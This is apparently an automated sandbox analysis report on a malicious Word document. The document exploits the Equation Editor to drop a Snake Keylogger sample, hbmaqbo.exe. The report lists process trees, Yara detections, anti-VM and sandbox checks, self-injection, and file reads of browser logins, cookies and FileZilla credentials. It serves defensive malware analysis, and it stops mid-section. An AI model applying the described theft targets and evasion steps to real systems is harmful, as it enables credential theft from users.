                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_0038560F5_2_0038560F
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_003846905_2_00384690
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_00383EF95_2_00383EF9
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_003826F05_2_003826F0
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_00382ED85_2_00382ED8
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_003836C15_2_003836C1
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_00380F385_2_00380F38
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_003817205_2_00381720
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_00383F085_2_00383F08
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_00381F085_2_00381F08
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_0038EF795_2_0038EF79
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_0038AF605_2_0038AF60
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_0038F75F5_2_0038F75F
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_0038DFB25_2_0038DFB2
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_003807A05_2_003807A0
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_0038E7905_2_0038E790
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_0038CFE25_2_0038CFE2
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_0038D7C85_2_0038D7C8
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_007800485_2_00780048
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_007810385_2_00781038
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_007808305_2_00780830
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_007818205_2_00781820
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_007820085_2_00782008
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_007827A05_2_007827A0
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_00782F885_2_00782F88
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_00782F785_2_00782F78
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_007827F05_2_007827F0
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_007807D05_2_007807D0
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_00780FC05_2_00780FC0
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_007817BF5_2_007817BF
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_00781FA95_2_00781FA9
                      Source: harcout[1].exe0.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@7/10@5/3
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$MPANY REQUIREMENT.docJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRB49E.tmpJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: COMPANY REQUIREMENT.docVirustotal: Detection: 45%
                      Source: COMPANY REQUIREMENT.docReversingLabs: Detection: 51%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\hbmaqbo.exe C:\Users\user\AppData\Roaming\hbmaqbo.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\hbmaqbo.exe {path}
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\hbmaqbo.exe C:\Users\user\AppData\Roaming\hbmaqbo.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess created: C:\Users\user\AppData\Roaming\hbmaqbo.exe {path}Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

                      Data Obfuscation:

                      barindex
                      Yara detected Beds ObfuscatorShow sources
                      Source: Yara matchFile source: 00000005.00000002.2339543125.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2081428524.00000000037BC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: hbmaqbo.exe PID: 2928, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: hbmaqbo.exe PID: 824, type: MEMORY
                      Source: Yara matchFile source: 5.2.hbmaqbo.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.hbmaqbo.exe.3a2c368.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.hbmaqbo.exe.3a2c368.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.hbmaqbo.exe.38964b8.5.raw.unpack, type: UNPACKEDPE
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_0134A746 push es; retn 001Fh4_2_0134A82E
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_0134A443 push es; iretd 4_2_0134A444
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_0036686F pushfd ; retf 0015h4_2_00366870
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_0036E311 push ss; ret 4_2_0036E312
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_0134A746 push es; retn 001Fh5_2_0134A82E
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_0134A443 push es; iretd 5_2_0134A444
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.87662667638
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\harcout[1].exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\hbmaqbo.exeJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM_3Show sources
                      Source: Yara matchFile source: Process Memory Space: hbmaqbo.exe PID: 824, type: MEMORY
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: hbmaqbo.exe, 00000004.00000002.2079713209.0000000002A08000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: hbmaqbo.exe, 00000004.00000002.2079713209.0000000002A08000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Yara detected Beds ObfuscatorShow sources
                      Source: Yara matchFile source: 00000005.00000002.2339543125.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2081428524.00000000037BC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: hbmaqbo.exe PID: 2928, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: hbmaqbo.exe PID: 824, type: MEMORY
                      Source: Yara matchFile source: 5.2.hbmaqbo.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.hbmaqbo.exe.3a2c368.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.hbmaqbo.exe.3a2c368.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.hbmaqbo.exe.38964b8.5.raw.unpack, type: UNPACKEDPE
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2692Thread sleep time: -360000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exe TID: 2844Thread sleep time: -31500s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exe TID: 260Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exe TID: 2488Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2816Thread sleep time: -120000s >= -30000sJump to behavior
                      Source: hbmaqbo.exe, 00000004.00000002.2079713209.0000000002A08000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                      Source: hbmaqbo.exe, 00000004.00000002.2079713209.0000000002A08000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: hbmaqbo.exe, 00000004.00000002.2079713209.0000000002A08000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: hbmaqbo.exe, 00000004.00000002.2079713209.0000000002A08000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: hbmaqbo.exe, 00000004.00000002.2079713209.0000000002A08000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: hbmaqbo.exe, 00000004.00000002.2079713209.0000000002A08000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: hbmaqbo.exe, 00000004.00000002.2079713209.0000000002A08000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: hbmaqbo.exe, 00000004.00000002.2079713209.0000000002A08000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: hbmaqbo.exe, 00000004.00000002.2079713209.0000000002A08000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_001E51C1 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,KiUserExceptionDispatcher,5_2_001E51C1
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeMemory written: C:\Users\user\AppData\Roaming\hbmaqbo.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\hbmaqbo.exe C:\Users\user\AppData\Roaming\hbmaqbo.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeProcess created: C:\Users\user\AppData\Roaming\hbmaqbo.exe {path}Jump to behavior
                      Source: hbmaqbo.exe, 00000005.00000002.2340135019.00000000013B0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: hbmaqbo.exe, 00000005.00000002.2340135019.00000000013B0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: hbmaqbo.exe, 00000005.00000002.2340135019.00000000013B0000.00000002.00000001.sdmpBinary or memory string: !Progman
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeQueries volume information: C:\Users\user\AppData\Roaming\hbmaqbo.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeQueries volume information: C:\Users\user\AppData\Roaming\hbmaqbo.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected Snake KeyloggerShow sources
                      Source: Yara matchFile source: 00000005.00000002.2339543125.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2081428524.00000000037BC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: hbmaqbo.exe PID: 2928, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: hbmaqbo.exe PID: 824, type: MEMORY
                      Source: Yara matchFile source: 5.2.hbmaqbo.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.hbmaqbo.exe.3a2c368.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.hbmaqbo.exe.3a2c368.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.hbmaqbo.exe.38964b8.5.raw.unpack, type: UNPACKEDPE
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Tries to steal Mail credentials (via file access)Show sources
